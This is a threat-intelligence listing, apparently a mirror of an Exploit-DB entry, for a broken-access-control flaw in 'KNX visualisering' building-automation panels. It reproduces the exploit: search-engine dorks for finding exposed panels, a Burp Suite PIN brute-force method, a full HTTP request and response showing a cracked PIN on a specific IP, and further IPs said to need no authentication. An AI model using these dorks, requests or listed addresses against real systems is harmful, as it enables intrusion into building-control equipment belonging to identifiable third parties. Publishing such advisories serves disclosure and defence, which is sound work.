KNX visualisering - Broken Access Control
KNX visualisering - Broken Access Control
Indicators of Compromise
- exploit-code: # Exploit Title: KNX visualisering - Broken Access Control # Date: 6/10/2026 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: KNX visualisering (https:/www.knxgroep.nl) # Version: KNX visualisering # Tested on: Windows/Linux Step 1 : Attacker can using these dorks then can find the KNX panel . Shodan : title:"KNX visualisering" OR https://www.shodan.io/search?query=title%3A%22KNX+visualisering%22 ZoomEye : "KNX visualisering" OR https://www.zoomeye.ai/searchResult?q=IktOWCB2aXN1YWxpc2VyaW5nIg%3D%3D Fofa : ("KNX visualisering") && icon_hash=="2019991370" OR https://en.fofa.info/result?qbase64=KCJLTlggdmlzdWFsaXNlcmluZyIpICYmIGljb25faGFzaD09IjIwMTk5OTEzNzAi Step 2 : We Found pincode panel and they dont have RateLimit so attacker can brute force it using tools like BrupSuite. The attacker can try several numbers to know what the length of the number is for that panel, for example, one panel is 4 digits or another panel is 6 digits. Notic : Most panels Dont need authentication Example : Attacker used the dorks and founded this IP 62.163.74.206 after that attacker use the Burp Suite to brute force it . Request : POST /scada-vis/pin?return=index HTTP/1.1 Host: 62.163.74.206 Content-Length: 10 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.9 Origin: http://62.163.74.206 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://62.163.74.206/scada-vis/pin?return=index Accept-Encoding: gzip, deflate, br Connection: keep-alive pin=123456 In the up request attack will know the pin length is 6 so now attacker going to try 6 numbers from 000000 to 999999 . I founded the pin and that is 200908 . Response : HTTP/1.1 302 Moved Temporarily Date: Wed, 10 Jun 2026 07:26:40 GMT Content-Type: text/html Content-Length: 126 Connection: keep-alive Set-Cookie: pin=200908; Path=/ Location: /scada-vis/index <html> <head><title>302 Found</title></head> <body bgcolor="white"> <center><h1>302 Found</h1></center> </body> </html> Some Panels without authentication : https://85.147.34.42/scada-vis https://185.72.160.230/scada-vis
KNX visualisering - Broken Access Control
Description
KNX visualisering - Broken Access Control
Technical Details
- Version
- KNX visualisering
- Vendor
- KNX visualisering
- Author
- parsa rezaie khiabanloo
- Platform
- Windows/Linux
- Edb Id
- 52613
- Has Exploit Code
- true
- Code Language
- perl
Indicators of Compromise
Exploit Source Code
Exploit code for KNX visualisering - Broken Access Control
# Exploit Title: KNX visualisering - Broken Access Control # Date: 6/10/2026 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: KNX visualisering (https:/www.knxgroep.nl) # Version: KNX visualisering # Tested on: Windows/Linux Step 1 : Attacker can using these dorks then can find the KNX panel . Shodan : title:"KNX visualisering" OR https://www.shodan.io/search?query=title%3A%22KNX+visualisering%22 ZoomEye : "KNX visualisering" OR https://www.zoomeye.ai/searchResult?q=IktOWCB2aX... (1884 more characters)
Threat ID: 6a4c4f4d27e9c797199c909a
Added to database: 07/07/2026, 00:58:53 UTC
Last updated: 07/07/2026, 00:58:53 UTC
Views: 1
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.